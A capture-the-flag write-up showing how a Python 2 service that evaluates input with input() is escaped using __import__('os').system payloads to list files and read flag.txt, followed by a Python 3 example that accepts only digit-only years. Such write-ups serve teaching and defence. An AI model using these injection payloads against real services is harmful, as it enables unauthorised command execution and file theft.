Y2K

Challenge:

They told us the world was going to end in the year 2000! But it didn't… when will the world end?

nc challenge.ctf.games 31656

Solution:

Connecting to the service produced the following:

$ nc challenge.ctf.games 31656
What year do YOU think the world will end?

Entering a year produced a response that included my input:

1927
Yeah! I agree with you! I also think the world will end in the year
1927

At first it appears the service is simply echoing my input, so I ran another quick test to see if my input was being evaluated by sending "1900+1020":

$ nc challenge.ctf.games 31656
What year do YOU think the world will end?
1900+1020
Yeah! I agree with you! I also think the world will end in the year
2920

The service responded with 2920 so it appears that my input is being evaluated. Next I checked to see how it handles errors by forcing a "division by zero" error by entering "2/0":

$ nc challenge.ctf.games 31656
What year do YOU think the world will end?
2/0
Traceback (most recent call last):
  File "/home/challenge/server.py", line 4, in <module>
    end = input()
  File "<string>", line 1, in <module>
ZeroDivisionError: integer division or modulo by zero

So the service lacks error handling and I also now know the service is a Python script. Escaping from Python Jails is a common CTF challenge, so I start with some basic techniques.

__import__("os").system("ls")

server.py
flag.txt

Getting the flag is as simple as viewing the contents of the flag.txt file.

__import__("os").system("cat flag.txt")

flag{we_are_saved_from_py2_k}
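
The traceback shows server.py reading the answer with `end = input()`, and in Python 2 `input()` evaluates the line it reads as an expression, which is why arithmetic and `__import__` both ran. The following is an added example, not the challenge's code, of handling the same prompt in Python 3 by treating the line strictly as data; the function names, the year bounds and the error message are assumptions.

```python
import re

# Assumed bounds for a plausible "year" answer; not taken from the challenge.
MIN_YEAR, MAX_YEAR = 1, 9999
_YEAR_RE = re.compile(r"[0-9]{1,4}")

REPLY = "Yeah! I agree with you! I also think the world will end in the year"


def parse_year(line):
    """Return the year as an int, or None if the line is not a plain year.

    The text is matched against a digit-only pattern and converted with
    int(); it is never passed to eval(), exec() or Python 2's input().
    """
    text = line.strip()
    if not _YEAR_RE.fullmatch(text):
        return None
    year = int(text)
    return year if MIN_YEAR <= year <= MAX_YEAR else None


def respond(line):
    """Build the service reply without leaking a traceback on bad input."""
    year = parse_year(line)
    if year is None:
        return "Please enter a year as digits only."
    return f"{REPLY}\n{year}"


if __name__ == "__main__":
    # Constructed inputs mirroring the ones tried in the write-up.
    for sample in ["1927", "1900+1020", "2/0", '__import__("os").system("ls")']:
        print(repr(sample), "->", repr(respond(sample)))
```

With this handling, the expression inputs from the write-up get the same generic error as any other non-year text, and no file path or line number from the server is disclosed.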
